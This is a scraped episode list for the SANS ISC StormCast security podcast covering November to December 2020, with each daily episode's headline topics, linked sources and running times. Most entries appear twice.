Python Backdoor Talking to a C2 Through Ngrok https://isc.sans.edu/forums/diary/Python+Backdoor+Talking+to+a+C2+Through+Ngrok/26866/ Cisco Releases Improved Patch for Jabber Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-ZktzjpgO https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/ SANS Holiday Hack Challenge https://holidayhackchallenge.com/2020/ Karim Lalji: Fear of the Unkown: A Metanalysis of Insecure Object Deserialization Vulnerabilities https://www.sans.org/reading-room/whitepapers/testing/fear-unknown-metanalysis-insecure-object-deserialization-vulnerabilities-39920
12/11/202013 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, December 10th 2020

Oblivious DoH https://blog.cloudflare.com/oblivious-dns/ HTTP Archive Almanach https://almanac.httparchive.org/en/2020/security Open Source IoT TCP/IP Stack Vulnerabilities https://www.forescout.com/company/resources/amnesia33-how-tcp-ip-stacks-breed-critical-vulnerabilities-in-iot-ot-and-it-devices/ Fireeye Red Team Tool Signatures https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html
12/10/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, December 10th 2020

Oblivious DoH https://blog.cloudflare.com/oblivious-dns/ HTTP Archive Almanach https://almanac.httparchive.org/en/2020/security Open Source IoT TCP/IP Stack Vulnerabilities https://www.forescout.com/company/resources/amnesia33-how-tcp-ip-stacks-breed-critical-vulnerabilities-in-iot-ot-and-it-devices/ Fireeye Red Team Tool Signatures https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html
12/10/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, December 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/December+2020+Microsoft+Patch+Tuesday+Exchange+Sharepoint+Dynamics+and+DNS+Spoofing/26860/ Adobe Patch Tuesday https://helpx.adobe.com/security.html OpenSSL Patch (Tuesday) https://www.openssl.org/news/secadv/20201208.txt
12/9/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, December 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/December+2020+Microsoft+Patch+Tuesday+Exchange+Sharepoint+Dynamics+and+DNS+Spoofing/26860/ Adobe Patch Tuesday https://helpx.adobe.com/security.html OpenSSL Patch (Tuesday) https://www.openssl.org/news/secadv/20201208.txt
12/9/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, December 8th 2020

Corrupt BASE64 Strings: Detection and Decoding https://isc.sans.edu/forums/diary/Corrupt+BASE64+Strings+Detection+and+Decoding/26616/ Microsoft Teams Remote Code Execution Vulnerability (Patched) https://github.com/oskarsve/ms-teams-rce PlayStation Now RCE https://hackerone.com/reports/873614 Cisco Security Manager Java Deserialization Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csm-java-rce-mWJEedcD
12/8/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, December 8th 2020

Corrupt BASE64 Strings: Detection and Decoding https://isc.sans.edu/forums/diary/Corrupt+BASE64+Strings+Detection+and+Decoding/26616/ Microsoft Teams Remote Code Execution Vulnerability (Patched) https://github.com/oskarsve/ms-teams-rce PlayStation Now RCE https://hackerone.com/reports/873614 Cisco Security Manager Java Deserialization Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csm-java-rce-mWJEedcD
12/8/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 7th 2020

Proxy Scanner Attempting to Connect to Specific Hostname https://isc.sans.edu/forums/diary/Is+IP+91199118137+testing+Access+to+aahwwx52hostxyz/26852/ Recovering Passwords From Pixelized Screenshots https://www.linkedin.com/pulse/recovering-passwords-from-pixelized-screenshots-sipke-mellema/ Tomcat Information Leak http://mail-archives.us.apache.org/mod_mbox/www-announce/202012.mbox/%3C52858194-2efd-6f17-1821-9036c8494df0%40apache.org%3E Google Updates https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html
12/7/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, December 7th 2020

Proxy Scanner Attempting to Connect to Specific Hostname https://isc.sans.edu/forums/diary/Is+IP+91199118137+testing+Access+to+aahwwx52hostxyz/26852/ Recovering Passwords From Pixelized Screenshots https://www.linkedin.com/pulse/recovering-passwords-from-pixelized-screenshots-sipke-mellema/ Tomcat Information Leak http://mail-archives.us.apache.org/mod_mbox/www-announce/202012.mbox/%3C52858194-2efd-6f17-1821-9036c8494df0%40apache.org%3E Google Updates https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html
12/7/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, December 4th 2020

Traffic Analysis Quiz: Mr. Natural https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Mr+Natural/26844/ An iOS Zero-Click Radio Proximity Exploit Odyssey https://googleprojectzero.blogspot.com/2020/12/an-ios-zero-click-radio-proximity.html Github "State of the Octoverse" Report https://octoverse.github.com/static/2020-security-report.pdf Christopher Hurless: Open-Source Endpoint Detection and Response with CIS Benchmarks, OSQuery, Elastic Stack and The Hive https://www.sans.org/reading-room/whitepapers/incident/open-source-endpoint-detection-response-cis-benchmarks-osquery-elastic-stack-thehive-39900
12/4/202016 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, December 4th 2020

Traffic Analysis Quiz: Mr. Natural https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Mr+Natural/26844/ An iOS Zero-Click Radio Proximity Exploit Odyssey https://googleprojectzero.blogspot.com/2020/12/an-ios-zero-click-radio-proximity.html Github "State of the Octoverse" Report https://octoverse.github.com/static/2020-security-report.pdf Christopher Hurless: Open-Source Endpoint Detection and Response with CIS Benchmarks, OSQuery, Elastic Stack and The Hive https://www.sans.org/reading-room/whitepapers/incident/open-source-endpoint-detection-response-cis-benchmarks-osquery-elastic-stack-thehive-39900
12/4/202016 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, December 3rd 2020

Prevelance of DNS Spoofing https://arxiv.org/abs/2011.12978 New npm Malware Includes Bladabindi Trojan https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware DarkIRC Bot Exploits Recent Oracle WebLogic Vulnerablity https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability
12/3/20206 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, December 3rd 2020

Prevelance of DNS Spoofing https://arxiv.org/abs/2011.12978 New npm Malware Includes Bladabindi Trojan https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware DarkIRC Bot Exploits Recent Oracle WebLogic Vulnerablity https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability
12/3/20206 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, December 2nd 2020

Xanthe Docker Aware Miner https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html#more Ocean Lotus Mac Backdoor https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html OpenClinic vs OpenClinic GA https://labs.bishopfox.com/advisories/openclinic-version-0.8.2 https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01 https://sourceforge.net/p/open-clinic/discussion/1231980/thread/a2e8909fc5/ Register For Cyberstart https://www.cyberstartamerica.org
12/2/20208 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, December 2nd 2020

Xanthe Docker Aware Miner https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html#more Ocean Lotus Mac Backdoor https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html OpenClinic vs OpenClinic GA https://labs.bishopfox.com/advisories/openclinic-version-0.8.2 https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01 https://sourceforge.net/p/open-clinic/discussion/1231980/thread/a2e8909fc5/ Register For Cyberstart https://www.cyberstartamerica.org
12/2/20208 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, December 1st 2020

Decrypting PowerShell Payloads https://isc.sans.edu/forums/diary/Decrypting+PowerShell+Payloads+video/26838/ Trend Micro ServerProtect for Linux https://success.trendmicro.com/solution/000281950 WebKit Vulnerabilities https://blog.talosintelligence.com/2020/11/vuln-spotlight-webkit-use-after-free-nov-2020.html New Skimmer JS https://twitter.com/AffableKraut/status/1333258498910588928
12/1/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, December 1st 2020

Decrypting PowerShell Payloads https://isc.sans.edu/forums/diary/Decrypting+PowerShell+Payloads+video/26838/ Trend Micro ServerProtect for Linux https://success.trendmicro.com/solution/000281950 WebKit Vulnerabilities https://blog.talosintelligence.com/2020/11/vuln-spotlight-webkit-use-after-free-nov-2020.html New Skimmer JS https://twitter.com/AffableKraut/status/1333258498910588928
12/1/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, November 30th 2020

Live Patching Windows API Calls Using PowerShell https://isc.sans.edu/forums/diary/Live+Patching+Windows+API+Calls+Using+PowerShell/26826/ Threat Hunting with JARM https://isc.sans.edu/forums/diary/Threat+Hunting+with+JARM/26832/ https://isc.sans.edu/forums/diary/Quick+Tip+Using+JARM+With+a+SOCKS+Proxy/26834/ Be Careful With IoT Gifts https://cybernews.com/security/walmart-exclusive-routers-others-made-in-china-contain-backdoors-to-control-devices/ https://www.cyberscoop.com/smart-doorbells-amazon-ebay-ncc-vulnerabilities/ Active Exploitation of Mobile Iron Vulnerabilities https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability
11/30/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, November 30th 2020

Live Patching Windows API Calls Using PowerShell https://isc.sans.edu/forums/diary/Live+Patching+Windows+API+Calls+Using+PowerShell/26826/ Threat Hunting with JARM https://isc.sans.edu/forums/diary/Threat+Hunting+with+JARM/26832/ https://isc.sans.edu/forums/diary/Quick+Tip+Using+JARM+With+a+SOCKS+Proxy/26834/ Be Careful With IoT Gifts https://cybernews.com/security/walmart-exclusive-routers-others-made-in-china-contain-backdoors-to-control-devices/ https://www.cyberscoop.com/smart-doorbells-amazon-ebay-ncc-vulnerabilities/ Active Exploitation of Mobile Iron Vulnerabilities https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability
11/30/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, November 25th 2020

The Special Case of TCP Resets https://isc.sans.edu/forums/diary/The+special+case+of+TCP+RST/26824/ VMWare Workspace Vulnerability https://www.theregister.com/2020/11/24/vmware_urges_sysadmins_to_implement/ Holiday Hack Challenge 2020 https://holidayhackchallenge.com/2020/
11/25/202011 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, November 25th 2020

The Special Case of TCP Resets https://isc.sans.edu/forums/diary/The+special+case+of+TCP+RST/26824/ VMWare Workspace Vulnerability https://www.theregister.com/2020/11/24/vmware_urges_sysadmins_to_implement/ Holiday Hack Challenge 2020 https://holidayhackchallenge.com/2020/
11/25/202011 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, November 24th 2020

Quick Tip: Cobalt Strike Beacon Analysis https://isc.sans.edu/forums/diary/Quick+Tip+Cobalt+Strike+Beacon+Analysis/26818/ Godaddy Social Engineering Used to Compromise Bitcoin Exchange Domains https://blog.liquid.com/security-incident-november-13-2020 Spoofed FBI Domains https://www.ic3.gov/Media/Y2020/PSA201123
11/24/20203 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, November 24th 2020

Quick Tip: Cobalt Strike Beacon Analysis https://isc.sans.edu/forums/diary/Quick+Tip+Cobalt+Strike+Beacon+Analysis/26818/ Godaddy Social Engineering Used to Compromise Bitcoin Exchange Domains https://blog.liquid.com/security-incident-november-13-2020 Spoofed FBI Domains https://www.ic3.gov/Media/Y2020/PSA201123
11/24/20203 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, November 23rd 2020

Updates for VMWare ESXi; Fusion and Workstation https://www.vmware.com/security/advisories/VMSA-2020-0026.html IBM DB2 Vulnerability https://www.ibm.com/support/pages/node/6370025 https://www.ibm.com/support/pages/node/6370023 Fortinet SSL VPN Exploit Used to Collect Credentials https://twitter.com/Bank_Security/status/1329426020647243778
11/23/20203 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, November 23rd 2020

Updates for VMWare ESXi; Fusion and Workstation https://www.vmware.com/security/advisories/VMSA-2020-0026.html IBM DB2 Vulnerability https://www.ibm.com/support/pages/node/6370025 https://www.ibm.com/support/pages/node/6370023 Fortinet SSL VPN Exploit Used to Collect Credentials https://twitter.com/Bank_Security/status/1329426020647243778
11/23/20203 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, November 20th 2020

PowerShell Dropper Delivering Formbook https://isc.sans.edu/forums/diary/PowerShell+Dropper+Delivering+Formbook/26806/ Google Leading the Way in Phishing https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign Identifying Malicious Servers With JARM https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a Daniel Behrens: Industrial Traffic Collection: Understanding the Implications of Deploying Visibility Without Impacting Production https://www.sans.org/reading-room/whitepapers/ICS/industrial-traffic-collection-understanding-implications-deploying-visibility-impacting-production-39810
11/20/202015 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, November 20th 2020

PowerShell Dropper Delivering Formbook https://isc.sans.edu/forums/diary/PowerShell+Dropper+Delivering+Formbook/26806/ Google Leading the Way in Phishing https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign Identifying Malicious Servers With JARM https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a Daniel Behrens: Industrial Traffic Collection: Understanding the Implications of Deploying Visibility Without Impacting Production https://www.sans.org/reading-room/whitepapers/ICS/industrial-traffic-collection-understanding-implications-deploying-visibility-impacting-production-39810
11/20/202015 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, November 19th 2020

When Security Controls Lead to Security Issues https://isc.sans.edu/forums/diary/When+Security+Controls+Lead+to+Security+Issues/26804/ Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_17.html Firefox 83 HTTPS Only Mode https://blog.mozilla.org/security/2020/11/17/firefox-83-introduces-https-only-mode/ OOB Windows Kerberos Update https://docs.microsoft.com/en-us/windows/release-information/windows-message-center Cisco WebEx Patch Fixes "Ghost Users" https://securityintelligence.com/posts/ibm-works-with-cisco-exorcise-ghosts-webex-meetings/ Ransomware Flooding Printers https://twitter.com/Irlenys/status/1327784305465188353
11/19/20205 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, November 19th 2020

When Security Controls Lead to Security Issues https://isc.sans.edu/forums/diary/When+Security+Controls+Lead+to+Security+Issues/26804/ Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_17.html Firefox 83 HTTPS Only Mode https://blog.mozilla.org/security/2020/11/17/firefox-83-introduces-https-only-mode/ OOB Windows Kerberos Update https://docs.microsoft.com/en-us/windows/release-information/windows-message-center Cisco WebEx Patch Fixes "Ghost Users" https://securityintelligence.com/posts/ibm-works-with-cisco-exorcise-ghosts-webex-meetings/ Ransomware Flooding Printers https://twitter.com/Irlenys/status/1327784305465188353
11/19/20205 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, November 18th 2020

Apple Binaries Used to Bypass 3rd Party Security Products on MacOS 11 https://twitter.com/patrickwardle/status/1327726496203476992 Apple Improving Privacy on App Certificate Checks https://support.apple.com/en-us/HT202491 Cisco Security Manager Vulnerabilities https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e https://tools.cisco.com/security/center/publicationListing.x
11/18/20205 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, November 18th 2020

Apple Binaries Used to Bypass 3rd Party Security Products on MacOS 11 https://twitter.com/patrickwardle/status/1327726496203476992 Apple Improving Privacy on App Certificate Checks https://support.apple.com/en-us/HT202491 Cisco Security Manager Vulnerabilities https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e https://tools.cisco.com/security/center/publicationListing.x
11/18/20205 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, November 17th 2020

Old Vulnerbilities Don't Die https://isc.sans.edu/forums/diary/Heartbleed+BlueKeep+and+other+vulnerabilities+that+didnt+disappear+just+because+we+dont+talk+about+them+anymore/26798/ Citrix Virtual Apps and Desktops Security Update https://support.citrix.com/article/CTX285059 Zoom Security Improvements https://blog.zoom.us/new-ways-to-combat-zoom-meeting-disruptions/ Firefox File Read Vulnerability Details https://medium.com/@kanytu/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
11/17/20206 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, November 17th 2020

Old Vulnerbilities Don't Die https://isc.sans.edu/forums/diary/Heartbleed+BlueKeep+and+other+vulnerabilities+that+didnt+disappear+just+because+we+dont+talk+about+them+anymore/26798/ Citrix Virtual Apps and Desktops Security Update https://support.citrix.com/article/CTX285059 Zoom Security Improvements https://blog.zoom.us/new-ways-to-combat-zoom-meeting-disruptions/ Firefox File Read Vulnerability Details https://medium.com/@kanytu/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
11/17/20206 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, November 16th 2020

Oledump Removed Macro Indicator https://isc.sans.edu/forums/diary/oledumps+Indicator/26794/ Old Worm But New Obfuscation Technique https://isc.sans.edu/forums/diary/Old+Worm+But+New+Obfuscation+Technique/26792/ MacOS OCSP Disaster https://blog.cryptohack.org/macos-ocsp-disaster VoltPillager: Hardware-base fault injection attacks against Instel SGX Enclaves using the SVID voltage scaling interface https://www.usenix.org/system/files/sec21summer_chen-zitai.pdf
11/16/20206 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, November 16th 2020

Oledump Removed Macro Indicator https://isc.sans.edu/forums/diary/oledumps+Indicator/26794/ Old Worm But New Obfuscation Technique https://isc.sans.edu/forums/diary/Old+Worm+But+New+Obfuscation+Technique/26792/ MacOS OCSP Disaster https://blog.cryptohack.org/macos-ocsp-disaster VoltPillager: Hardware-base fault injection attacks against Instel SGX Enclaves using the SVID voltage scaling interface https://www.usenix.org/system/files/sec21summer_chen-zitai.pdf
11/16/20206 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, November 13th 2020

Preventing Exposed Azure Blob Storage https://isc.sans.edu/forums/diary/Preventing+Exposed+Azure+Blob+Storage/26786/ Apple Security Updates https://support.apple.com/en-us/HT201222 DNS Cache Poisoning Attack Reloaded https://dl.acm.org/doi/pdf/10.1145/3372297.3417280 Rebel Powell: Poisoned Postman; Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment https://www.sans.org/reading-room/whitepapers/cloud/poisoned-postman-detecting-manipulation-compliance-features-microsoft-exchange-online-environment-39850
11/13/202014 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, November 13th 2020

Preventing Exposed Azure Blob Storage https://isc.sans.edu/forums/diary/Preventing+Exposed+Azure+Blob+Storage/26786/ Apple Security Updates https://support.apple.com/en-us/HT201222 DNS Cache Poisoning Attack Reloaded https://dl.acm.org/doi/pdf/10.1145/3372297.3417280 Rebel Powell: Poisoned Postman; Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment https://www.sans.org/reading-room/whitepapers/cloud/poisoned-postman-detecting-manipulation-compliance-features-microsoft-exchange-online-environment-39850
11/13/202014 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, November 12th 2020

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+DESKTOPFX23IK5/26780/ Open Source Security Scorecards https://github.com/ossf/scorecard Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/ Ubuntu 20.04 Privilege Escalation https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
11/12/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, November 12th 2020

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+DESKTOPFX23IK5/26780/ Open Source Security Scorecards https://github.com/ossf/scorecard Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/ Ubuntu 20.04 Privilege Escalation https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
11/12/20206 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, November 11th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2020+Patch+Tuesday/26778/ "Platypus" Attack against Intel SGX https://platypusattack.com/ Adobe Updates https://helpx.adobe.com/security.html Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2020-49/#CVE-2020-26950 Fingerprinting ADS-B Signals https://icnp20.cs.ucr.edu/proceedings/aimcom2/Real-World%20ADS-B%20signal%20recognition%20based%20on%20Radio%20Frequency%20Fingerprinting.pdf
11/11/20206 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, November 11th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2020+Patch+Tuesday/26778/ "Platypus" Attack against Intel SGX https://platypusattack.com/ Adobe Updates https://helpx.adobe.com/security.html Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2020-49/#CVE-2020-26950 Fingerprinting ADS-B Signals https://icnp20.cs.ucr.edu/proceedings/aimcom2/Real-World%20ADS-B%20signal%20recognition%20based%20on%20Radio%20Frequency%20Fingerprinting.pdf
11/11/20206 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, November 10th 2020

How Attackers Brush Up Their Malicious Scripts https://isc.sans.edu/forums/diary/How+Attackers+Brush+Up+Their+Malicious+Scripts/26770/ RansomEXX Trojan Attacks Linux Systems https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ Fake Microsoft Teams Updates Lead to Cobalt Strike Deployment https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ More NPM Malare Found https://blog.sonatype.com/discord.dll-successor-to-npm-fallguys- The Internet is Getting Safer: Fall 2020 RPKI Update https://blog.cloudflare.com/rpki-2020-fall-update/
11/10/20205 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, November 10th 2020

How Attackers Brush Up Their Malicious Scripts https://isc.sans.edu/forums/diary/How+Attackers+Brush+Up+Their+Malicious+Scripts/26770/ RansomEXX Trojan Attacks Linux Systems https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ Fake Microsoft Teams Updates Lead to Cobalt Strike Deployment https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ More NPM Malare Found https://blog.sonatype.com/discord.dll-successor-to-npm-fallguys- The Internet is Getting Safer: Fall 2020 RPKI Update https://blog.cloudflare.com/rpki-2020-fall-update/
11/10/20205 minutes, 58 seconds
Episode Artwork

ISC StormCast for Monday, November 9th 2020

Cryptojacking Targeting WebLogic TCP/7001 Cryptojacking Targeting WebLogic TCP/7001 https://isc.sans.edu/forums/diary/Cryptojacking+Targeting+WebLogic+TCP7001/26768/ Extracting VBA Code From Maldocs https://isc.sans.edu/forums/diary/Quick+Tip+Extracting+all+VBA+Code+from+a+Maldoc/26772/ Let's Encrypt May No Longer Be Recognized by Older Android Versions https://letsencrypt.org/2020/11/06/own-two-feet.html Linux Kernel to Remove set_fs() http://lkml.iu.edu/hypermail/linux/kernel/2010.3/00552.html BigIP Vulnerability https://support.f5.com/csp/article/K43310520
11/9/20205 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, November 9th 2020

Cryptojacking Targeting WebLogic TCP/7001 Cryptojacking Targeting WebLogic TCP/7001 https://isc.sans.edu/forums/diary/Cryptojacking+Targeting+WebLogic+TCP7001/26768/ Extracting VBA Code From Maldocs https://isc.sans.edu/forums/diary/Quick+Tip+Extracting+all+VBA+Code+from+a+Maldoc/26772/ Let's Encrypt May No Longer Be Recognized by Older Android Versions https://letsencrypt.org/2020/11/06/own-two-feet.html Linux Kernel to Remove set_fs() http://lkml.iu.edu/hypermail/linux/kernel/2010.3/00552.html BigIP Vulnerability https://support.f5.com/csp/article/K43310520
11/9/20205 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, November 6th 2020

Did You Spot "Invoke-Expression" ? https://isc.sans.edu/forums/diary/Did+You+Spot+InvokeExpression/26762/ Apple Security Updates https://support.apple.com/en-us/HT201222 Corporte VoIP Phone System Attacks https://blog.checkpoint.com/2020/11/05/whos-calling-gaza-and-west-bank-hackers-exploit-and-monetize-corporate-voip-phone-system-vulnerability-internationally/ Mark Lucas: Replacing WINS in an Open Environment with Policy Managed DNS Servers https://www.sans.org/reading-room/whitepapers/dns/replacing-wins-open-environment-policy-managed-dns-servers-39820
11/6/202015 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, November 6th 2020

Did You Spot "Invoke-Expression" ? https://isc.sans.edu/forums/diary/Did+You+Spot+InvokeExpression/26762/ Apple Security Updates https://support.apple.com/en-us/HT201222 Corporte VoIP Phone System Attacks https://blog.checkpoint.com/2020/11/05/whos-calling-gaza-and-west-bank-hackers-exploit-and-monetize-corporate-voip-phone-system-vulnerability-internationally/ Mark Lucas: Replacing WINS in an Open Environment with Policy Managed DNS Servers https://www.sans.org/reading-room/whitepapers/dns/replacing-wins-open-environment-policy-managed-dns-servers-39820
11/6/202015 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, November 5th 2020

Cisco AnyConnect Security Mobility Client https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK Google Chrome Root CA Policy https://www.chromium.org/Home/chromium-security/root-ca-policy Android November 2020 Security Bulletin https://source.android.com/security/bulletin/2020-11-01
11/5/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, November 5th 2020

Cisco AnyConnect Security Mobility Client https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-ipc-KfQO9QhK Google Chrome Root CA Policy https://www.chromium.org/Home/chromium-security/root-ca-policy Android November 2020 Security Bulletin https://source.android.com/security/bulletin/2020-11-01
11/5/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, November 4th 2020

Attackers Exploiting WebLogic Servers to Install Cobalt Strike https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752 New SaltStack Vulnerabilities https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ Adobe Releases Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb20-67.html Malicious Twilio NPM Package https://www.npmjs.com/advisories/1574 GitHub Workflow Injection Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2070&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids
11/4/20205 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, November 4th 2020

Attackers Exploiting WebLogic Servers to Install Cobalt Strike https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752 New SaltStack Vulnerabilities https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ Adobe Releases Acrobat/Reader Update https://helpx.adobe.com/security/products/acrobat/apsb20-67.html Malicious Twilio NPM Package https://www.npmjs.com/advisories/1574 GitHub Workflow Injection Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2070&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids
11/4/20205 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, November 3rd 2020

Emotet -> Qakbot -> More Emotet https://isc.sans.edu/forums/diary/Emotet+Qakbot+more+Emotet/26750/ WebLogic Bad News https://www.oracle.com/security-alerts/alert-cve-2020-14750.html https://twitter.com/80vul/status/1322078337137700865 Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html NAT Slipstreaming Re-Discovered https://thehackernews.com/2020/11/new-natfirewall-bypass-attack-lets.html
11/3/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, November 3rd 2020

Emotet -> Qakbot -> More Emotet https://isc.sans.edu/forums/diary/Emotet+Qakbot+more+Emotet/26750/ WebLogic Bad News https://www.oracle.com/security-alerts/alert-cve-2020-14750.html https://twitter.com/80vul/status/1322078337137700865 Google Chrome Update https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html NAT Slipstreaming Re-Discovered https://thehackernews.com/2020/11/new-natfirewall-bypass-attack-lets.html
11/3/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, November 2nd 2020

Quick Status of the CAA DNS Record Adoption https://isc.sans.edu/forums/diary/Quick+Status+of+the+CAA+DNS+Record+Adoption/26738/ Windows Kernel cng.sys pool-based buffer overflow CVE-2020-17087 https://bugs.chromium.org/p/project-zero/issues/detail?id=2104 Operation Earth Kitsune https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations
11/2/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, November 2nd 2020

